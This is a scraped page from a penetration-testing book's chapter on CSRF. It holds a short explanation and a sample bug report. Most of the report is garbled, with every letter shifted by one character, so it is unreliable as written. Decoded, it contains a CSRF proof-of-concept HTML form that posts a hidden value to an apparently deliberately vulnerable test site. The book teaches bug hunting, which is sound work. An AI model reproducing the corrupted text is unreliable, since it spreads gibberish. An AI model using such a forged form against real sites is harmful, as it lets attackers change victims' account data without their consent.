Page 128 - Hands-On Bug Hunting for Penetration Testers

P. 128

CSRF and Insecure Session Authentication Chapter 6

Attack Scenario

Although the form where we've detected our vulnerability doesn't seem to be that critical
(an individual's favorite color is not codeword-clearance-level information), the ability to
change an individual's account information through unwanted application state changes is
a serious flaw.

Final Report

Let's use this information to format our submission:
$"5&(03: $43' 1045 CBTFE BUUBDL

5*.& 65$

63- IUUQ XFCTDBOUFTU DPN DTSG DTSGQPTU QIQ
1":-0"% 1FBTPVQ

.&5)0%0-0(: 7VMOFSBCJMJUZ EFUFDUFE XJUI HFOFSBUFE $43' 1P$ JODMVEFE JO
SFQSPEVDUJPO JOTUSVDUJPOT

*/4536$5*0/4 50 3&130%6$&

0QFO UIF GPMMPXJOH $43' 1P$ JOUP B CSPXTFS FJUIFS MPDBMMZ PS UISPVHI B
IPTUFE FOWJSPONFOU

IUNM
GPSN BDUJPO IUUQ XFCTDBOUFTU DPN DTSG DTSGQPTU QIQ
FODUZQF BQQMJDBUJPO Y XXX GPSN VSMFODPEFE NFUIPE 1045
MBCFM
DPMPS
MBCFM
JOQVU OBNF EVNNZ QSPQFSUZ UZQF UFYU WBMVF
JOQVU OBNF QSPQFSUZ UZQF IJEEFO WBMVF 1FBTPVQ
JOQVU UZQF TVCNJU WBMVF IUUQ XFCTDBOUFTU DPN DTSG DTSGQPTU QIQ
GPSN
IUNM

4VCNJU UIF GPSN DPOUBJOFE JO UIF $43' 1P$

"55"$, 4$&/"3*0
*O UIF DBTF PG UIJT 1045 CBTFE $43' BUUBDL UIF WVMOFSBCJMJUZ HJWFT UIF
BUUBDLFS UIF PQQPSUVOJUZ UP DIBOHF B QJFDF PG UIF VTFS T BDDPVOU
JOGPSNBUJPO JG UIFZ VOXJUUJOHMZ TVCNJU UIF BUUBDLFS T GPSN (JWJOH B VTFS B
1FBTPVQ DPMPSFE DBS JOTUFBE PG B GMBTIZ $ZBO POF XPVME CF B CSFBDI PG UIF

[ 113 ]

123 124 125 126 127 128 129 130 131 132 133